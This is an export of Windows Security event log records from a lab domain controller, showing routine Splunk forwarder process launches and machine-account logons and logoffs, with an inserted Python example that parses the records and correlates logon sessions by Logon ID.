Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263620
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x106c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263622
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1494
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263623
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1894
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263624
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x735C99
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 52955
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:16:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263625
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263627
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1260
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263626
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1860
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:21 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263628
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x735C99
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:16:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263631
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x737C5B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:16:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263630
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x737C5B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59908
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:16:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263629
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x737C5B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
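Worked example, added here and not part of the exported log (nor Splunk's or Microsoft's code): a Python parser for the record format this page uses (a timestamp line opens each record, Key=Value header lines follow, then "Field: value" body lines and the descriptive sentences) that joins 4624, 4672 and 4634 on Logon ID, as the 4634 description above says to. Two things the description does not spell out drive the design. First, a 4624 carries two "Logon ID" fields, the Subject one (0x0 above) and the New Logon one (the session), so fields are keyed by section. Second, the records at 02:16:55 above arrive with the 4634 for 0x737C5B before its own 4624 and 4672, so the correlation groups events per (ComputerName, Logon ID) before deriving anything, and it keys on the host because Logon IDs are only unique per computer between reboots. The sample log is constructed from values in the records above with the descriptive text cut to one line; the "Section/Field" key form and the session dictionary layout are this example's own choices.

```python
import re
from datetime import datetime

# Constructed sample in this page's export format: values copied from the records above,
# descriptive text cut to one line, and the 02:16:55 records kept in the page's own order.
SAMPLE_LOG = r"""04/19/2021 02:16:11 PM
EventCode=4624
ComputerName=win-dc-209.attackrange.local
Subject:
Logon ID: 0x0
Logon Information:
Logon Type: 3
New Logon:
Account Name: WIN-HOST-797$
Logon ID: 0x735C99
Network Information:
Source Network Address: 10.0.1.15
This event is generated when a logon session is created. It is generated on the computer that was accessed.
04/19/2021 02:16:21 PM
EventCode=4634
ComputerName=win-dc-209.attackrange.local
Subject:
Logon ID: 0x735C99
04/19/2021 02:16:55 PM
EventCode=4634
ComputerName=win-dc-209.attackrange.local
Subject:
Logon ID: 0x737C5B
04/19/2021 02:16:55 PM
EventCode=4624
ComputerName=win-dc-209.attackrange.local
Logon Information:
Logon Type: 3
New Logon:
Account Name: WIN-DC-209$
Logon ID: 0x737C5B
04/19/2021 02:16:55 PM
EventCode=4672
ComputerName=win-dc-209.attackrange.local
Subject:
Logon ID: 0x737C5B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeDebugPrivilege"""

TS_RE = re.compile(r"^\d\d/\d\d/\d{4} \d\d:\d\d:\d\d [AP]M$")  # a timestamp line starts a record
KV_RE = re.compile(r"^([A-Za-z ()]+): ?(.*)$")                 # "Field: value" or bare "Section:"

def parse_records(text):
    """One dict per event; body fields are keyed "Section/Field" so the Logon ID under
    Subject (0x0 in a 4624) and the one under New Logon (the session) never collide."""
    records, rec, section, last = [], {}, "", None
    for line in text.splitlines():
        if TS_RE.match(line):
            rec, section, last = {"_time": datetime.strptime(line, "%m/%d/%Y %I:%M:%S %p")}, "", None
            records.append(rec)
        elif not section and "=" in line:             # Key=Value header lines (EventCode, ...)
            rec.update([line.split("=", 1)])
        elif (m := KV_RE.match(line)):
            k, v = m.groups()
            if not v:                                 # bare "Subject:" opens a section
                section = k
            else:
                last = f"{section}/{k}"
                rec[last] = [v] if k == "Privileges" else v
        elif last and last.endswith("/Privileges"):   # 4672 lists one privilege per line
            rec[last].append(line.strip())
        # anything else is the descriptive text appended to every event: dropped
    return records

def correlate_sessions(records):
    """Join 4624 / 4672 / 4634 on (ComputerName, Logon ID): IDs are unique only per host
    between reboots, and same-second records in the export are not in event order, so
    group first and only then derive start, end, duration and privileges."""
    groups, sessions = {}, {}
    for r in records:
        code = r.get("EventCode")
        lid = r.get("New Logon/Logon ID" if code == "4624" else "Subject/Logon ID")
        if code in ("4624", "4672", "4634") and lid:
            groups.setdefault((r["ComputerName"], lid), []).append(r)
    for key, evts in groups.items():
        s = {"account": None, "logon_type": None, "source": None,
             "start": None, "end": None, "privileges": [], "seconds": None}
        for r in evts:
            if r["EventCode"] == "4624":
                s.update(account=r["New Logon/Account Name"], start=r["_time"],
                         logon_type=r.get("Logon Information/Logon Type"),
                         source=r.get("Network Information/Source Network Address"))
            elif r["EventCode"] == "4672":
                s["privileges"] = r["Subject/Privileges"]
            else:
                s["end"] = r["_time"]
        if s["start"] and s["end"]:
            s["seconds"] = (s["end"] - s["start"]).total_seconds()
        sessions[key] = s
    return sessions

if __name__ == "__main__":
    print(correlate_sessions(parse_records(SAMPLE_LOG)))
```

On the sample this yields a 10-second type-3 session for WIN-HOST-797$ from 10.0.1.15 with no 4672 (an ordinary machine-account network logon) and a zero-length session for WIN-DC-209$ that carries SeDebugPrivilege and the rest of the privilege list, which is what the 4672 above marks as a special logon. A 4634 whose 4624 is outside the exported window leaves start and seconds as None rather than guessing; 4688 records are skipped here because their Creator Subject Logon ID (0x3E7, the SYSTEM session on every record above) is not a session the 4624/4634 pair describes.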
04/19/2021 02:17:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263632
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263634
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1664
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263633
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19e8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263635
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x167c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263636
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x2c8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263638
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xf7c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263637
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xc98
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:17:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263644
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73AC7F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:17:18 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263643
